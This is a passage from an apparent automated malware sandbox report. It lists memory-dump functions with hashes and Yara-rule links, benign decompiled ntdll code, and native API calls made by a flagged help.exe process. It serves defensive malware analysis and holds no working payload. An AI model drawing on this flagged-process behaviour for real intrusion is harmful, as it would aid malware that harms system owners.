                                          • Instruction ID: 40715bea496688c8a01c74735f78a84067f75e4045f65c6fc9c4b876c3cd1b15
                                          • Opcode Fuzzy Hash: 5b88846ee1e294fd4e9cc89925868428b145eaedc5d2b5489a315215def12724
                                          • Instruction Fuzzy Hash: 4B90027561504C06D150B1594458746000597D0341F92C021A1014654D87998A5576E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E9650, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 06ff1617338b281ebf1a170f07c0dcf1564d9ddf50c30675de21ee6ce5547cb5
                                          • Instruction ID: 0ad5808dea6cf9c81d6918c780a465062922e272c1fd24cfa825cc53a82e5938
                                          • Opcode Fuzzy Hash: 06ff1617338b281ebf1a170f07c0dcf1564d9ddf50c30675de21ee6ce5547cb5
                                          • Instruction Fuzzy Hash: C590027521508C46D140B1594448A46001597D0345F92C021A1054694D97698D55B6A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E9A80, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9ef09b5a5f76bad35df4de6cdd42ac600d9edf8ce154bb7f636397da27e86884
                                          • Instruction ID: 5a8f9b2e76d6788b8761ccc4dcab3a13a5b48df6a20e5405f8452211ca4f4fd7
                                          • Opcode Fuzzy Hash: 9ef09b5a5f76bad35df4de6cdd42ac600d9edf8ce154bb7f636397da27e86884
                                          • Instruction Fuzzy Hash: 0190026521148846D140A2594848B0F410597E1342FD2C029A5146554CCA5988557761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E96D0, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8f47120e2f3d9de5fa40250c2163270363c9bcb7a3a45c0cee43094293393ccc
                                          • Instruction ID: a3b6733879d4ea976b14725c608547ac299f20879933023ea301e66b0e0dee19
                                          • Opcode Fuzzy Hash: 8f47120e2f3d9de5fa40250c2163270363c9bcb7a3a45c0cee43094293393ccc
                                          • Instruction Fuzzy Hash: 4F90027521104C46D100A1594448B46000597E0341F92C026A1114654D8759C8517561
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033EAD30, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8298832f89d6682e7560ea8f0079536eb1bff8dbe1bbf23400571f7face9ea89
                                          • Instruction ID: 7a7303b4cc61f8c8f6b74f7fedbc82666d4a91df09ce16c21323349224769727
                                          • Opcode Fuzzy Hash: 8298832f89d6682e7560ea8f0079536eb1bff8dbe1bbf23400571f7face9ea89
                                          • Instruction Fuzzy Hash: F3900275A15044169140B15948586464006A7E0781B96C021A1504554C8A988A5573E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E9520, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 29ee996f1a4cb568eb12fa34adcd8c083d7feb9cb53a5399f2137dd415e6e7b0
                                          • Instruction ID: 4fc0b8b68b0ffce8604cd6987fe58cd3978c830ba7d707ea8f85100958269291
                                          • Opcode Fuzzy Hash: 29ee996f1a4cb568eb12fa34adcd8c083d7feb9cb53a5399f2137dd415e6e7b0
                                          • Instruction Fuzzy Hash: 3C9002E5211184964500E2598448B0A450597E0341B92C026E2044560CC6698851B175
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E9560, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5702533407f754bd22a22400c2aed24561e5d6a43e889edf39d793598a14c5d3
                                          • Instruction ID: e3d4cd321f0823863bc4f9211eab2a21f81e69d7d415f4e40fa9e8d0d8815bda
                                          • Opcode Fuzzy Hash: 5702533407f754bd22a22400c2aed24561e5d6a43e889edf39d793598a14c5d3
                                          • Instruction Fuzzy Hash: 35900269231044060145E559064850B0445A7D63913D2C025F2406590CC76588657361
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E9950, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3aa8d5f3557bc5465395f3a6e6cf6f983c05f15d42d2636b4dc8280e2ad888aa
                                          • Instruction ID: 2710274a04b73cd659ea9c7d013bf21877f9a25bbf65fe3a126d00644ce6882e
                                          • Opcode Fuzzy Hash: 3aa8d5f3557bc5465395f3a6e6cf6f983c05f15d42d2636b4dc8280e2ad888aa
                                          • Instruction Fuzzy Hash: 0E9002A521144807D140A5594848607000597D0342F92C021A3054555E8B6D8C517175
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E95F0, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d90e8dc977588b2f5deae2f4d2406dc0268f4383e8f47cb5965ff0e806a9eb3a
                                          • Instruction ID: c76e970d477ec5cc7613f8e2a3f6c58becb12210e91a5056b9773c0e389c523a
                                          • Opcode Fuzzy Hash: d90e8dc977588b2f5deae2f4d2406dc0268f4383e8f47cb5965ff0e806a9eb3a
                                          • Instruction Fuzzy Hash: 7790027521104C06D104A1594848686000597D0341F92C021A7014655E97A988917171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E99D0, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d2176e2d80b703f46c7e3b5ed052406b92556b8b837d45bd76d2b7e37320e7db
                                          • Instruction ID: a8613e07b0a814a82d8e9365e360b4e298af3081125123364e28c33d50928a55
                                          • Opcode Fuzzy Hash: d2176e2d80b703f46c7e3b5ed052406b92556b8b837d45bd76d2b7e37320e7db
                                          • Instruction Fuzzy Hash: 249002A522104446D104A1594448706004597E1341F92C022A3144554CC66D8C617165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E9820, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 41c106b506f4622b0917774fdde79fbb3a987d1404a90a747b1b64862c0ae0e4
                                          • Instruction ID: fc8c2d859eb74028472962843d138090be9afe6f4b8c43650f77cef52902c5bf
                                          • Opcode Fuzzy Hash: 41c106b506f4622b0917774fdde79fbb3a987d1404a90a747b1b64862c0ae0e4
                                          • Instruction Fuzzy Hash: DF90027525104806D141B15944486060009A7D0381FD2C022A1414554E87998A56BAA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033EB040, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 72f606d6ae1149f325fbfe354f898d5ea8c01ca9dab8634cb3652b5ab814c24b
                                          • Instruction ID: de6010506a52f3ac6494b88700c63d64b6a6e4e3c97b1caab7954f8542e410ec
                                          • Opcode Fuzzy Hash: 72f606d6ae1149f325fbfe354f898d5ea8c01ca9dab8634cb3652b5ab814c24b
                                          • Instruction Fuzzy Hash: C99002A5611184474540F15948484065015A7E13413D2C131A1444560C87AC8855B2A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E98A0, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 611764b46a2fa0c773a5cc682d51f2643f4956b6afc56c8fc8838afa53611c2c
                                          • Instruction ID: d6638fbc9f767e28fd533600a74a5aab56fc7351988fa82df31b497d03ac4aed
                                          • Opcode Fuzzy Hash: 611764b46a2fa0c773a5cc682d51f2643f4956b6afc56c8fc8838afa53611c2c
                                          • Instruction Fuzzy Hash: 6590026531104806D102A15944586060009D7D1385FD2C022E2414555D87698953B172
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E9670, Relevance: .0, Instructions: 2COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction ID: d8b6485c6ee266277d4adbfc5edf275e992b9193651b9ec612ac92ae69e98bc8
                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0343FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E0343FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E033ECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03435720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03435720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                          0x0343fdda
                                          0x0343fde2
                                          0x0343fde5
                                          0x0343fdec
                                          0x0343fdfa
                                          0x0343fdff
                                          0x0343fe0a
                                          0x0343fe0f
                                          0x0343fe17
                                          0x0343fe1e
                                          0x0343fe19
                                          0x0343fe19
                                          0x0343fe19
                                          0x0343fe20
                                          0x0343fe21
                                          0x0343fe22
                                          0x0343fe25
                                          0x0343fe40

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0343FDFA
                                          Strings
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0343FE2B
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0343FE01
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                          • API String ID: 885266447-3903918235
                                          • Opcode ID: 7041ed1d849fc0ac414c7bf2af8ce6aa21017b4bd5f8a902d6485729bca063d2
                                          • Instruction ID: e6cab6eaa1f5fec6a72405f43735ff14399ac2e04591b359020fb957d7127661
                                          • Opcode Fuzzy Hash: 7041ed1d849fc0ac414c7bf2af8ce6aa21017b4bd5f8a902d6485729bca063d2
                                          • Instruction Fuzzy Hash: 7FF0F636640601BFEB209A45DC42F27BB5AEB4A730F140316F6385E1E1DA62F82086F4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Analysis Process: help.exe PID: 3552 Parent PID: 3472 help.exeCOMMON

                                          Executed Functions

                                          Function 001B9D50, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,001B4B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,001B4B77,007A002E,00000000,00000060,00000000,00000000), ref: 001B9D9D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: .z`
                                          • API String ID: 823142352-1441809116
                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                          • Instruction ID: 9364f90a40c2dacf8c212015a4c8ba32e6f3a6b8be6e69ed3e5d213f7b1e0426
                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                          • Instruction Fuzzy Hash: 15F0BDB2200208AFCB08CF88DC95EEB77ADAF8C754F158248FA1D97241C630E8118BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001B9D4B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,001B4B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,001B4B77,007A002E,00000000,00000060,00000000,00000000), ref: 001B9D9D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: .z`
                                          • API String ID: 823142352-1441809116
                                          • Opcode ID: 53167fe1e11e6fbc92b5f601ef20f6b66584c3089ca23ff950748158a2a5fb36
                                          • Instruction ID: 6b9490dfe3ecc602521adfb51010847d017e6ad6b2447b696ae880ac9fbba9b2
                                          • Opcode Fuzzy Hash: 53167fe1e11e6fbc92b5f601ef20f6b66584c3089ca23ff950748158a2a5fb36
                                          • Instruction Fuzzy Hash: 3FF0E7B2214149AFCB08CF98D895CEB77A9FF8C354B15864DFA5D97202D634E851CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001B9E4A, Relevance: 1.5, APIs: 1, Instructions: 41nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtClose.NTDLL(001B4D10,?,?,001B4D10,00000000,FFFFFFFF), ref: 001B9EA5
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 7b500a1161a565175b9f49bcb2e95399ad47d4757cd59eeebd46d293cf8443a1
                                          • Instruction ID: d98d91fa4bab5b40f6a42ee51c6fe2a548a52c2539ca99efc33acc5cec2bfcc5
                                          • Opcode Fuzzy Hash: 7b500a1161a565175b9f49bcb2e95399ad47d4757cd59eeebd46d293cf8443a1
                                          • Instruction Fuzzy Hash: E5F06D766002107FEB20EF98CC85FE77B68EF48360F164595FA5CAB242C630EA0187E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001B9DFB, Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtReadFile.NTDLL(001B4D32,5EB6522D,FFFFFFFF,001B49F1,?,?,001B4D32,?,001B49F1,FFFFFFFF,5EB6522D,001B4D32,?,00000000), ref: 001B9E45
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: c8d4bc81fb19d29a6bd628f964efe81bd728c0afc4f8fd8540208be7ce3d0aec
                                          • Instruction ID: a9e3ebd98eb381e4de90f410fbb188d94d2484abc2b5ccba152be23822973e37
                                          • Opcode Fuzzy Hash: c8d4bc81fb19d29a6bd628f964efe81bd728c0afc4f8fd8540208be7ce3d0aec
                                          • Instruction Fuzzy Hash: FFF0F9B6200108AFCB14CF98DC95EEB77A9EF8C754F158249FE1D97241C630E851CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001B9E00, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtReadFile.NTDLL(001B4D32,5EB6522D,FFFFFFFF,001B49F1,?,?,001B4D32,?,001B49F1,FFFFFFFF,5EB6522D,001B4D32,?,00000000), ref: 001B9E45
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                          • Instruction ID: 24a7c33478eff8d2f2521b348d819d572e96491fbc0efb0138247f323678c5be
                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                          • Instruction Fuzzy Hash: AFF0A4B2200208AFDB14DF89DC91EEB77ADAF8C754F158248BA5D97241D630E8118BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001B9F30, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,001A2D11,00002000,00003000,00000004), ref: 001B9F69
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                          • Instruction ID: c2c7bbcaa65ff1df890f552cc20df2ced9322b6da08c8a6865803a321cf7d676
                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                          • Instruction Fuzzy Hash: 30F015B2200208AFDB14DF89CC81EEB77ADAF88754F118148FE5897241C630F810CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001B9E7A, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtClose.NTDLL(001B4D10,?,?,001B4D10,00000000,FFFFFFFF), ref: 001B9EA5
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 4ddbbd8fc344ccaab40a1d73686de920bedc9a007f016247bd6f8382caae8f55
                                          • Instruction ID: af05845c2a95e81b7a6c3a55c5a1c944283b30213323dd8527249cf874c1411e
                                          • Opcode Fuzzy Hash: 4ddbbd8fc344ccaab40a1d73686de920bedc9a007f016247bd6f8382caae8f55
                                          • Instruction Fuzzy Hash: EAE012752403147BD715EF98DC85FD77B68EF88750F554465FA5C5B242C630E60187D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001B9E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtClose.NTDLL(001B4D10,?,?,001B4D10,00000000,FFFFFFFF), ref: 001B9EA5
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                          • Instruction ID: d7f499187fa78fdd6976c0a7f070da286cf3fc49996cc41de16dc4b0ae6d0764
                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                          • Instruction Fuzzy Hash: 2AD01776200314BBE710EB98CC86EE77BACEF48760F154499BA5C9B242C630FA0086E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02AC96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.496528037.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true
                                          • Associated: 00000013.00000002.497189560.0000000002B7B000.00000040.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 510652c1f0670a1c0eccf39f2388dd3f33aa35369c9f9dfc3af525a2c5959b6b
                                          • Instruction ID: e7685b9e8c1f1ec9e45c72e81b82229443cc091e356c6bdf0612cc09207a9fd5
                                          • Opcode Fuzzy Hash: 510652c1f0670a1c0eccf39f2388dd3f33aa35369c9f9dfc3af525a2c5959b6b
                                          • Instruction Fuzzy Hash: 0D90027624148802D1106169840474B000597D0341F55C811A4424658D8AD588917161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02AC96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.496528037.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true
                                          • Associated: 00000013.00000002.497189560.0000000002B7B000.00000040.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a7d88163826bf54a920ec312bad67553fb2353ed2b92902fe7cb8b4d8a9c165b
                                          • Instruction ID: 30e248b5bba28e4ebd62e11c7e1f3fa757515adac5ac11f8db302249e59eec7a
                                          • Opcode Fuzzy Hash: a7d88163826bf54a920ec312bad67553fb2353ed2b92902fe7cb8b4d8a9c165b
                                          • Instruction Fuzzy Hash: 2C90027624140842D10061694404B47000597E0341F51C416A0124654D8A55C8517561
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02AC9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.496528037.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true
                                          • Associated: 00000013.00000002.497189560.0000000002B7B000.00000040.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 9d46cef62b331bf5033f513fdc5dff72b033c77f2d806a8554f1a25e53010a4a
                                          • Instruction ID: 757d318cfcddfb9656d19a9ced7e7247dea15277bd2100a27d14ff14a7ea0b2b
                                          • Opcode Fuzzy Hash: 9d46cef62b331bf5033f513fdc5dff72b033c77f2d806a8554f1a25e53010a4a
                                          • Instruction Fuzzy Hash: 1690027624140802D1807169440464B000597D1341F91C415A0025654DCE558A5977E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02AC9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.496528037.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true
                                          • Associated: 00000013.00000002.497189560.0000000002B7B000.00000040.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 122dccbee34253e88aaf2aeb07687be91b7db3ab81be20c03e8321096d5edc18
                                          • Instruction ID: 0c64083b5589b6998b7fc7f5278a4489352ca2f5add2a016f08f63e28223002a
                                          • Opcode Fuzzy Hash: 122dccbee34253e88aaf2aeb07687be91b7db3ab81be20c03e8321096d5edc18
                                          • Instruction Fuzzy Hash: 5390027624544842D14071694404A47001597D0345F51C411A0064694D9A658D55B6A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02AC9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.496528037.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true
                                          • Associated: 00000013.00000002.497189560.0000000002B7B000.00000040.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 45518a242a7743cb0188468a90ab46cd5eadd7368b036516c69a16ed40d0d5a1
                                          • Instruction ID: 996cb83cb1adf73109aa1e1a3c62ed97565bf1f700c4b4bcdb63f932178addd8
                                          • Opcode Fuzzy Hash: 45518a242a7743cb0188468a90ab46cd5eadd7368b036516c69a16ed40d0d5a1
                                          • Instruction Fuzzy Hash: D5900477351C0043D300757D4C14F070005D7D0343F51C515F0154554CCD55CC717571
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02AC9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.496528037.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true
                                          • Associated: 00000013.00000002.497189560.0000000002B7B000.00000040.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3cedbb6eb5a3f58d17e3104cad3c2bd20fe7ed7dc9ff9a10eb986b072d9f1388
                                          • Instruction ID: 089473021808988c16249eeba7f8151e39e34af589cf1d05a75e0a740a3a18f3
                                          • Opcode Fuzzy Hash: 3cedbb6eb5a3f58d17e3104cad3c2bd20fe7ed7dc9ff9a10eb986b072d9f1388
                                          • Instruction Fuzzy Hash: 0E90026E25340002D1807169540860B000597D1242F91D815A0015558CCD5588696361
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02AC9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.496528037.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true
                                          • Associated: 00000013.00000002.497189560.0000000002B7B000.00000040.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d927177282b3544b0ce7717e995917b63317e97270b71a6fd1e351a3b99de69b
                                          • Instruction ID: eafbf85a5962a530e406d2d16e2013620c92a0ebc09f02727f713ba865b7a421
                                          • Opcode Fuzzy Hash: d927177282b3544b0ce7717e995917b63317e97270b71a6fd1e351a3b99de69b
                                          • Instruction Fuzzy Hash: B790027635154402D11061698404707000597D1241F51C811A0824558D8AD588917162
                                          Uniqueness

